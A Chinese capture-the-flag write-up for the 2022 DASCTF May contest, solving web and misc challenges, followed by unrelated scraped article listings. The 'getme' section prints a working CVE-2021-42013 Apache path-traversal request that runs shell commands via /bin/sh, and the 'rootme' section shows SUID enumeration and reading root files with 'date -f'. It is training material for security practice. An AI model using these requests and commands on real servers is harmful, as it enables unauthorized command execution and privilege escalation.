2022DASCTF MAY 出题人挑战赛 Writeup

文章目录

  • WEB
    • Power Cookie
    • 魔法浏览器
    • getme
  • MISC
    • 不懂PCB的厨师不是好黑客
    • 卡比
    • 噪音
    • rootme
    • 神必流量


WEB

Power Cookie

在这里插入图片描述
在这里插入图片描述
设置Cookie: admin=1;即可
在这里插入图片描述

魔法浏览器

在这里插入图片描述
把源码中的JS拿到Console运行,得到一个UA
在这里插入图片描述
在这里插入图片描述

getme

在这里插入图片描述
在这里插入图片描述
Apache/2.4.50,去年时间出的Apache 远程代码执行 (CVE-2021-42013)
在这里插入图片描述

  • https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: node4.buuoj.cn:28174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 06 May 2022 14:36:36 GMT
If-None-Match: "8d-5de58c91a8500"
Content-Length: 45echo Content-Type: text/plain; echo;ls -lha /

在这里插入图片描述
在这里插入图片描述

MISC

不懂PCB的厨师不是好黑客

在这里插入图片描述
在这里插入图片描述

DASCTF{77e64b28-3e93-42ed-a576-b2e1ab718be6}

卡比

在这里插入图片描述
在这里插入图片描述
维吉尼亚
在这里插入图片描述

FLAG{IMVERYLIKEKIRBY}

噪音

在这里插入图片描述
和我以前出的一题有点像:https://mochu.blog.csdn.net/article/details/122005160

对振幅的数值进行分析,可以用上面链接中的脚本分析,或者直接用010 Editor打开加载wav插件
在这里插入图片描述

import waveobj = wave.open('attachment.wav', 'r')
frames = obj.getnframes()
print("All Frames: {}".format(frames))
frames_data = obj.readframes(50).hex()#提取出前50帧的数据
for i in range(0, len(frames_data), 4):data = frames_data[i:i+4]real_data = int(data[2:] + data[:2], 16)data1 = data[2:] + data[:2]print("第{:<2}帧: {} => {}  真实数据值: {}".format(int((i+4)/4), data,data1 , real_data))

在这里插入图片描述
在这里插入图片描述
简单分析下还是能发现每一帧的数值

约等于1000
约等于1500
约等于2000
约等于2500
约等于3000
约等于3500
约等于4000
约等于4500
约等于5000
约等于5500
约等于6000
约等于6500
约等于7000
约等于7500
约等于8000
约等于8500

按照区间可以分成十六部分,猜测十六进制

import wave
import binasciiobj = wave.open('attachment.wav', 'r')
frames = obj.getnframes()
print("All Frames: {}".format(frames))
frames_data = obj.readframes(frames).hex()
hexdata = ''
for i in range(0, len(frames_data), 4):data = frames_data[i:i+4]real_data = int(data[2:] + data[:2], 16)if real_data < 1000:hexdata += '0'elif real_data > 1000 and real_data < 1500:hexdata += '1'elif real_data > 1500 and real_data < 2000:hexdata += '2'elif real_data > 2000 and real_data < 2500:hexdata += '3'elif real_data > 2500 and real_data < 3000:hexdata += '4'elif real_data > 3000 and real_data < 3500:hexdata += '5'elif real_data > 3500 and real_data < 4000:hexdata += '6'elif real_data > 4000 and real_data < 4500:hexdata += '7'elif real_data > 4500 and real_data < 5000:hexdata += '8'elif real_data > 5000 and real_data < 5500:hexdata += '9'elif real_data > 5500 and real_data < 6000:hexdata += 'a'elif real_data > 6000 and real_data < 6500:hexdata += 'b'elif real_data > 6500 and real_data < 7000:hexdata += 'c'elif real_data > 7000 and real_data < 7500:hexdata += 'd'elif real_data > 7500 and real_data < 8000:hexdata += 'e'elif real_data > 8000 and real_data < 8500:hexdata += 'f'else:print(real_data)breakprint(binascii.unhexlify(hexdata))

在这里插入图片描述

DASCTF{muisc_noise_can_hide_Flaaaag}

rootme

在这里插入图片描述
查找具有SUID权限的命令

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
date命令有个-f参数可以读文件
在这里插入图片描述
在这里插入图片描述

神必流量

在这里插入图片描述
在这里插入图片描述
选中右键...as a Hex Stream复制出来
在这里插入图片描述
37 7a bc af开始截取,转7z

from binascii import *hexdata = '377abcaf271c00044aaed88750000000000000006a000000000000002d108d3939dc5abb57f2606b99b18fb7518aa378d2dcfed3f7a197d4e752b6156b026bf975d5fa5c37618bdfe2c567592e7128e139c1a6ac4e9eed598dd3398c03c16a35502e827004852aae6a7342214fa901c30104060001095000070b0100022406f107010a5307ef3e981518c6bd122121010001000c4a4600080a011a4cdb8a00000501190900000000000000000011130066006c00610067002e0074007800740000001900140a010066629f3bc46cd801150601002000000000000600313233343536'
with open('flag.7z', 'wb') as f:f.write(unhexlify(hexdata))

解压密码是附加的123456
在这里插入图片描述
得到google云盘下载链接

https://drive.google.com/file/d/140MxBVh-OGvQUuk8tmOw4Xm8it9utIzo/view

在这里插入图片描述
需要对main.exe进行逆向分析

具体请参考:http://www.snowywar.top/?p=3323

DASCTF{6f938f4c-f850-4f04-b489-009c2ed1c4fd}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/48686.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

节日仪式感海报PSD分层模板,快来pick一下!

你心目中有仪式感的节日记忆 是什么样的呢&#xff1f; 一束鲜花&#xff1f; 一份精美礼盒&#xff1f; 快来pick一下&#xff0c;代表情感输出总要的传统情怀书信的魅力&#xff01; 花语祝福感恩格子信纸简约节日海报 格子信纸感恩鲜花花语祝福节日海报 感恩祝福格子信纸…

自动判卷 、答题卡识别、六级答题卡客观题自动判卷系统1.0

自动判卷 、答题卡识别、六级答题卡客观题自动判卷系统1.0 一、前言 二、代码 三、处理原图片、以及效果图片 四、总结 一.引言&#xff1a; 1.本程序设计想法来源于一次四六级考试&#xff0c;因为六级没有好好准备&#xff0c;裸考上阵&#xff0c;结果肯定是看不懂哈哈…

电商促销海报PSD模板|临摹优秀,设计好的banner广告从试炼开始!

每当你打开淘宝时&#xff0c;首页的banner广告总是会弹出你近期浏览过的或者是购买过的同类产品&#xff0c;这就是淘宝善于使用个人大数据&#xff0c;从而达到精准推广的效果。 而设计师在设计banner广告图之前&#xff0c;一般会参考之前投放的结果数据&#xff0c;例如设计…

端午节海报|端午节海报设计素材图片大全

2021年端午节放假时间安排表出来了&#xff0c;端午节海报也要准备起来啦&#xff01;快来把这组端午节海报收藏起来吧&#xff01; 所有素材均来自易图网&#xff0c;需要的话可以点击链接下载噢。 1、端午节粽子上市宣传海报 2、情浓端午清新海报设计 3、水墨风端午节海报设…

2023年AP考试报名开始,附详细报名流程和注意事项,社会考生速来

9月19日&#xff0c;美国大学理事会College Board 宣布大陆2023年AP考试报名正式开启。在2022-23学年&#xff0c;大学理事会继续与Prometric合作管理国内的AP考试报名和考务工作。 目前&#xff0c;2023年5月举行的AP考试报名工作已经正式启动&#xff0c;下面是2023年AP考试…

手绘风海报怎么做?手绘素材在哪里找?

打开浏览器搜索“易图网”&#xff0c;这个素材网站有很多手绘风作品和素材&#xff0c;原创设计&#xff0c;为您的设计增添无限灵感&#xff0c;比如下面几张海报就是最近更新的手绘风作品。 保护动物手绘动物绿色植物合集海报 保护动物海报手绘简单卡通森林动物海报 2022春…

用ps做一张海报

用ps做的一张海报 作者&#xff08;张福林&#xff09;撰写时间&#xff1a;2019年 1月 17日 见截图 &#xff08;海报里传达的地址、网址、电话号码&#xff0c;是因为创作需要而找来的请勿当真&#xff09; &#xff08;这是我在2018年12月二十几号做的一个关于元旦促销的海…

使用Photoshop制作圣诞海报

使用Photoshop制作圣诞海报 我们最终制作效果如下&#xff1a; 1.新建文档 文件——》新建&#xff0c;宽1134px&#xff0c;高850px&#xff0c;分辨率为300命名为圣诞海报的文档 2.设置背景渐变 选中背景图层&#xff0c;选择工具箱的渐变工具&#xff0c;在属性栏找到渐变…

计算机专业迎新晚会主题海报,如何制作迎新晚会宣传海报?推荐使用迎新海报素材!...

迎接新生晚会是校园内热烈欢迎新生儿必备的节目。在晚会节目上有才能的学生可以展示自己才艺表演。学生会为了让更多的学生参加晚会&#xff0c;都会提前张贴晚会宣传海报&#xff0c;告知学生晚会的时间、地点以及节目内容。在这里&#xff0c;小编想告诉大家&#xff0c;迎新…

用这套偷懒笔刷5分钟一副国潮插画海报,轻松玩转海报设计

好东西又来了 这次给大家带来的是 新国风飞鹤月亮祥云笔刷合集86款 像仙鹤&#xff0c;海浪&#xff0c;灵芝&#xff0c;鱼骨纹&#xff0c;灯笼&#xff0c;月亮&#xff0c;云纹 这里面都有 主要是它还兼容PS和ipad使用 在插画当中&#xff0c;现在最火的也属于国潮&#xf…

今日份PS练习|玉桂狗海报

可爱的玉桂狗来了哦&#xff01; 第一步 新建白色背景图层,把默认颜色换成黑白,滤镜-渲染-云彩,滤镜-模糊一高斯模糊;图像-调整-色调分离-拉动数值一确定 第二步 选择魔棒工具,调整数值,根据颜色选择色块,选中后按altdelete,填充颜色,改变后&#xff0c;复制一层&#xff0c…

今日份PS练习|长春花蓝海报设计稿预览

第一步 新建图层&#xff0c;用白色画笔画一个圆&#xff0c;笔刷硬度为0&#xff0c; 新建图层&#xff0c;滤镜-渲染-云彩&#xff0c;将云彩透明度改为30&#xff0c;再合并图层 第二步 将图层&#xff0c;滤镜-像素化-晶格化&#xff0c;调整数值。 将图层&#xff0c;…

如何用ps设计出一张吸引人眼球的创意节日海报?

不管做什么海报&#xff0c;重要的都是表达&#xff0c;节日海报更主要的是表达一种情怀。 比如中秋&#xff0c;月亮肯定是必备的元素&#xff0c;它表达的是中华民族几千年来对亲人、朋友、爱人的情思&#xff0c;所以海报上使用月亮元素非常常见&#xff1b;再比如国庆&…

探究ChatGPT在医学影像领域中的发展前景

医学影像技术是当今医疗领域的重要组成部分&#xff0c;广泛应用于临床诊断、治疗和研究等方面。然而&#xff0c;医学影像所涉及到的数据量非常大&#xff0c;难以直接进行人工分析和处理。因此&#xff0c;如何快速、准确地对医学影像数据进行自动化处理和分析&#xff0c;成…

斯坦福发布大模型Alpaca:A100上训3小时,性能比较GPT-3.5,被挤爆!

源&#xff5c;新智元 Meta的LLaMA模型开源&#xff0c;让文本大模型迎来了Stable Diffustion时刻。今天&#xff0c;斯坦福发布了一个由LLaMA 7B微调的模型Alpaca&#xff0c;训练3小时&#xff0c;性能比肩GPT-3.5。 一觉醒来&#xff0c;斯坦福大模型Alpaca&#xff08;草泥…

数控数据采集跨平台免授权扎克(mazak)西门子(Siemens)海德汉(heidenhain)广数(GSK)、凯恩帝(knd)、三菱、海德汉、兄弟、哈斯、宝元、新代、发那科(Fanuc)、华中

目录 前言 一、各类数控机床采集方案 1.Fanuc发那科数控 2.广数数控 3.西门子数控 4.MAZAK马扎克数控 5.HASS哈斯数控 6.新代数控 7.KND凯恩帝数控 8.Brother兄弟数控 9.HNC华中数控 10.三菱数控 11.台湾LNC宝元数控 12.HEIDENHAIN 海德汉数控 13.行业数控系统数…

思科(Netacad)账号注册教学,完美解决登录时找不到该账号的问题,亲身实测可用。最新最详细

学习Cisco.Packet.Tracer思科模拟器的时候需要登录思科网络学院的账号&#xff0c;注册步骤如下&#xff1a; 步骤一、 在浏览器中打开 Cisco Networking Academy Builds IT Skills & Education For Future Careers 思科的官网后&#xff0c;点击登录 步骤二、 点完登录…

2023 最新大猿人中控充值系统源码 免授权

支持公众号H5 分销等功能 大猿人中控系统目前是市面上用的最多的电话费充值中控系统&#xff0c;支持代理分销、公众号H5、API接口对接等功能&#xff0c;也是目前最完善的一款中控系统&#xff0c;前端全开源&#xff0c;已破解免授权&#xff01; 配置环境&#xff1a;php7…

高速AD采集项目JESD204B采集卡详细上板教程

本文为明德扬原创文章&#xff0c;转载请注明出处&#xff01; 明德扬通过JESD204B协议等完成此高速AD采集工程。综合上板后&#xff0c;可以使用上位机通过千兆网来配置AD9144和AD9516板卡&#xff0c;实现高速ad采集。最终可以在示波器和上位机上采集到&#xff0c;设定的频率…

CUAV RTK初步使用体验和感受

记录使用RTK进行无人机定位并操作的使用体验 一. RTK定位设置 使用的是CUAV制作发售的RTK&#xff0c;型号为C9P&#xff0c;目前该产品已经下架&#xff0c;上新了C9PS。 并不需要太多的设置&#xff0c;在飞控接入RTK后&#xff08;也包括普通的GPS模块&#xff09;&#xff…